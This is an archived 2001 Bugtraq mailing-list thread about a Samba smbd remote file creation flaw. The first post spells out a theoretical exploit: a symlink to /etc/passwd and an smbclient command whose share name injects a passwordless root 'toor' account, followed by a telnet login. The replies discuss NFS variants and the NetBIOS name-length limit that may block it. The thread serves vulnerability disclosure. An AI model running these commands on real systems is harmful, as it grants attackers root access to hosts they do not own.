6697226 2001-07-02 11:15 -0400  /40 rader/ Christopher William Palow <cwp@andrew.cmu.edu>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-02  23:26  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17754>
Ärende: Re: smbd remote file creation vulnerability
------------------------------------------------------------
From: Christopher William Palow <cwp@andrew.cmu.edu>
To: bugtraq@securityfocus.com
Message-ID: <Pine.LNX.4.21L-021.0107021108330.1654-100000@unix45.andrew.cmu.edu>

I was hoping to test this out but haven't been able to so here goes on
theoretical...  

How to make this exploit a remote one using AFS or other remote file
systems.

What does this exploit need on the remote side??  A symlink;
soo... on a AFS system ,preferably one of a well known node that most
AFS servers would have in their CellServDB such as andrew.cmu.edu or
athena.mit.edu, create a symlink to /etc/passwd named  x.log like

ln -s /etc/passwd /afs/andrew.cmu.edu/usr/<username>/x.log

now make the symlink world readable... then all you need is UNIXes
running samba in the vulnerable configuration and running AFS.

smbclient //afs.machine/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" \ 
 -n ../../../afs/andrew.cmu.edu/usr/<username>/x -N
telnet afs.machine
login as toor

if root logins aren't allowed make a dummy account first, login with
that then make a toor account ontop of that and su over to toor.


what machines does this really effect?  Those running samba and AFS,
mainly educational institutions or other large institutions.


Christopher Palow
palow@cmu.edu
Senior Electrical and Computer Engineering
Carnegie Mellon University
(6697226) /Christopher William Palow <cwp@andrew.cmu.edu>/(Ombruten)
Kommentar i text 6701572 av Dan Stromberg <strombrg@nis.acs.uci.edu>
Kommentar i text 6701646 av Daniel Jacobowitz <dmj+@andrew.cmu.edu>
6701572 2001-07-02 14:28 -0700  /13 rader/ Dan Stromberg <strombrg@nis.acs.uci.edu>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-03  19:09  av Brevbäraren
Extern mottagare: Christopher William Palow <cwp@andrew.cmu.edu>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17763>
Kommentar till text 6697226 av Christopher William Palow <cwp@andrew.cmu.edu>
Ärende: Re: smbd remote file creation vulnerability
------------------------------------------------------------
On Mon, Jul 02, 2001 at 11:15:29AM -0400, Christopher William Palow wrote:
> what machines does this really effect?  Those running samba and AFS,
> mainly educational institutions or other large institutions.

...or systems with NFS configured with /net.  Probably easier to find,
and wouldn't require creation on a machine the attacked system trusts
- any old NFS server on the internet should do then if /net is
configured.

-- 
Dan Stromberg                                               UCI/NACS/DCS
(6701572) /Dan Stromberg <strombrg@nis.acs.uci.edu>/
Bilaga (application/pgp-signature) i text 6701573
6701573 2001-07-02 14:28 -0700  /10 rader/ Dan Stromberg <strombrg@nis.acs.uci.edu>
Importerad: 2001-07-03  19:09  av Brevbäraren
Extern mottagare: Christopher William Palow <cwp@andrew.cmu.edu>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17764>
Bilaga (text/plain) till text 6701572
Ärende: Bilaga till: Re: smbd remote file creation vulnerability
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE7QOdjo0feVm00f/8RAlSLAJ0UQp/QZze1AMhBnC+1J5z87uK2XACfZIdq
Inb0zArw//D7r3J45cCqLqo=
=Tcjc
-----END PGP SIGNATURE-----
(6701573) /Dan Stromberg <strombrg@nis.acs.uci.edu>/
6701646 2001-07-02 14:30 -0700  /40 rader/ Daniel Jacobowitz <dmj+@andrew.cmu.edu>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-03  19:23  av Brevbäraren
Extern mottagare: Christopher William Palow <cwp@andrew.cmu.edu>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17765>
Kommentar till text 6697226 av Christopher William Palow <cwp@andrew.cmu.edu>
Ärende: Re: smbd remote file creation vulnerability
------------------------------------------------------------
From: Daniel Jacobowitz <dmj+@andrew.cmu.edu>
To: Christopher William Palow <cwp@andrew.cmu.edu>
Cc: bugtraq@securityfocus.com
Message-ID: <20010702143041.A798@nevyn.them.org>

On Mon, Jul 02, 2001 at 11:15:29AM -0400, Christopher William Palow wrote:
> I was hoping to test this out but haven't been able to so here goes on
> theoretical...  
> 
> How to make this exploit a remote one using AFS or other remote file
> systems.
> 
> What does this exploit need on the remote side??  A
> symlink; soo... on a AFS system ,preferably one of a well known node that
> most AFS servers would have in their CellServDB such as
> andrew.cmu.edu or athena.mit.edu, create a symlink to /etc/passwd named 
> x.log like
> 
> ln -s /etc/passwd /afs/andrew.cmu.edu/usr/<username>/x.log
> 
> now make the symlink world readable... then all you need is UNIXes running
> samba in the vulnerable configuration and running AFS.
> 
> smbclient //afs.machine/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" \ 
>  -n ../../../afs/andrew.cmu.edu/usr/<username>/x -N
> telnet afs.machine
> login as toor
> 
> if root logins aren't allowed make a dummy account first, login with that
> then make a toor account ontop of that and su over to toor.

Remember, the log path must be within 15 characters to fit in a
netbios name!  You're not going to get anywhere on andrew, or most
other AFS paths, with that restriction.

-- 
Daniel Jacobowitz                           Carnegie Mellon University
MontaVista Software                         Debian GNU/Linux Developer
(6701646) /Daniel Jacobowitz <dmj+@andrew.cmu.edu>/(Ombruten)